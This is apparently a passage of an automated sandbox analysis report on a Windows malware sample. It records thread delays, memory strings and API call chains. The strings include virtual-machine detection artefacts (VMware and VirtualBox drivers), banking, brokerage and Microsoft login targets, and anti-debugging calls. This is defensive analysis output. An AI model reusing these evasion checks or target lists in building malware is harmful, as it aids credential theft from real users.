                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597344Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594563Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594381Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594266Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 594047Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeThread delayed: delay time: 593938Jump to behavior
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmwaretrat
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vboxservice
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000268B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#C:\windows\System32\vboxservice.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3679440319.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1560585139.00000000005EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnfigp
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmwareuser
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000268B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmtoolsd
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.00000000038D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_0-83591
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_061C9578 LdrInitializeThunk,0_2_061C9578
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: GetLocaleInfoA,0_2_00417A20
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
